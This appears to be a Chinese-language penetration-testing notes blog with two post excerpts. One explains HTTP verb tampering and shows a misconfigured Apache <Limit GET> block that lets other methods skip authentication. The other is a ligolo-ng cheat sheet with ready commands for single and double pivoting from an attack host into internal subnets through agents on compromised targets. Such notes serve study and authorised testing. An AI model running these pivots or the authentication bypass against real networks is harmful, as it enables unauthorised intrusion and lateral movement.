Notes Site.

HTTP Verb Tampering

post @ 2024-09-20

HTTP Verb Tampering利用接受 HTTP 动词和方法的 Web 服务器。可以通过使用意外方法发送恶意请求来利用此攻击,这可能导致绕过 Web 应用程序的授权机制,甚至绕过其针对其他 Web 攻击的安全控制。

HTTP 有9 种不同的动词,常用的 HTTP Verb

Verb Description
GET 请求特定资源。可以通过 URL 中的查询字符串将附加数据传递给服务器(例如?param=value)。
POST 将数据发送到服务器。它可以处理多种类型的输入,例如文本、PDF 和其他形式的二进制数据。此数据附加在标头后面的请求正文中。POST 方法通常用于发送信息(例如表单/登录)或将数据(例如图像或文档)上传到网站。
HEAD 请求向服务器发出 GET 请求时返回的标头。它不返回请求正文,通常用于在下载资源之前检查响应长度。
PUT 在服务器上创建新资源。如果在未进行适当控制的情况下允许此方法,则会导致上传恶意资源。
DELETE 删除 Web 服务器上的现有资源。如果没有得到妥善保护,可能会因删除 Web 服务器上的关键文件而导致拒绝服务 (DoS)。
OPTIONS 返回有关服务器的信息,例如其接受的方法。
PATCH 对指定位置的资源应用部分修改。
TRACE 回显服务器收到的请求,主要用于测试或诊断。
CONNECT HTTP/1.1协议中预留给能够将连接改为隧道方式的代理服务器。通常用于SSL加密服务器的连接(经由非加密的HTTP代理服务器)。

Insecure Configurations

Web 服务器的身份验证配置可能仅限于特定的 HTTP 方法,这会导致某些 HTTP 方法无需身份验证即可访问。

Apache Web

 Apache Web 服务器存在漏洞的配置示例,该配置位于站点配置文件(例如 000-default.conf)或 .htaccess 网页配置文件中:

1
2
3
4
5
6
7
8
<Directory "/var/www/html/admin">  
    AuthType Basic  
    AuthName "Admin Panel"  
    AuthUserFile /etc/apache2/.htpasswd  
    <Limit GET>  
        Require valid-user  
    </Limit>  
</Directory>

此配置正在设置管理 Web 目录的授权配置。但是,由于使用了 <Limit GET> 关键字,Require valid-user 设置仅适用于 GET 请求,因此页面只能通过 POST 请求访问。即使同时指定了 GET 和 POST,页面也只能通过其他方法访问,例如 HEAD 或 OPTIONS

Tomcat Web

Read More

ligolo-ng

post @ 2024-09-12 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
ligolo-ng » help
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.6.2

Ligolo-ng - An advanced, yet simple tunneling tool

Commands:
=========
  certificate_fingerprint   Show the current selfcert fingerprint
  clear                     clear the screen
  connect_agent             Attempt to connect to a bind agent
  exit                      exit the shell
  help                      use 'help [command]' for command help
  ifconfig                  Show agent interfaces
  session                   Change the current relay agent

Interfaces
==========
  interface_create, ifcreate                Create a new tuntap interface
  interface_delete, ifdel                   Delete a tuntap interface
  interface_list, iflist, route_list        List available tun interfaces
  route_add, add_route, interface_route_add, interface_add_route  Add a route to a network interface
  route_del, del_route, interface_route_del, interface_del_route  Delete a route

Listeners
=========
  listener_add          Listen on the agent and redirect connections to the desired address
  listener_list         List currently running listeners
  listener_stop         Stop a listener

Tunneling
=========
  tunnel_list           List active tunnels
  tunnel_start, start   Start relaying connection to the current agent
  tunnel_stop, stop     Stop the tunnel

Environment

1
2
3
4
Attack Host: 172.16.2.2/16
Target Host1: 172.16.2.3/16 | 192.168.3.3/24
Target Host2: 192.168.3.4/24 | 192.168.4.4/24
...

Linux

Pivot

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Attack Host
sudo ./proxy -selfcert [-laddr 0.0.0.0:11601]
ligolo-ng » ifcreate --name ligolo1

# Target Host1
./agent -connect 172.16.2.2:11601 -ignore-cert

# Attack Host ligolo-ng
ligolo-ng » INFO[0008] Agent joined ......
ligolo-ng » session
[Agent : SESSION] » start --tun ligolo1
[Agent : SESSION] » ifconfig  # 查看 Target Interface
 
# Attack Host
sudo ip route add 192.168.3.0/24 dev ligolo1
# OR
[Agent : SESSION] » route_add --name ligolo1 --route 192.168.3.0/24

Double Pivot

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Attack Host
# 添加 Interface
ligolo-ng » ifcreate --name ligolo2
# 添加监听器,将此 Agent:11601 端口的流量转发到 Proxy:11601 端口
[Agent : SESSION] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# Target Host2
./agent- connect 192.168.3.3:11601 -ignore-cert

# Attack Host ligolo-ng
[Agent : SESSION] » session  # 切换会话
[Agent : SESSION-2] » start --tun ligolo2

# Attack Host
sudo ip route add 192.168.4.0/24 dev ligolo2
# OR
[Agent : SESSION] » route_add --name ligolo2 --route 192.168.4.0/24

Setting

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# listener 将此 Agent:2222 端口的流量转发到 Proxy:2222 端口
[Agent : SESSION] » listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:2222 --tcp 
# File Transfer or ...
$ python3 -m http.server 2222

# Bind Pivot Box
# 访问 240.0.0.1 可直接与绑定的 Pivot 交互
sudo ip route add 240.0.0.1/32 dev ligolo

# Delete Interface
ligolo-ng » interface_delete --name ligolo
#OR
sudo ip link delete ligolo
# OR
sudo ifconfig ligolo down
sudo ifconfig ligolo delete
Read More
⬆︎TOP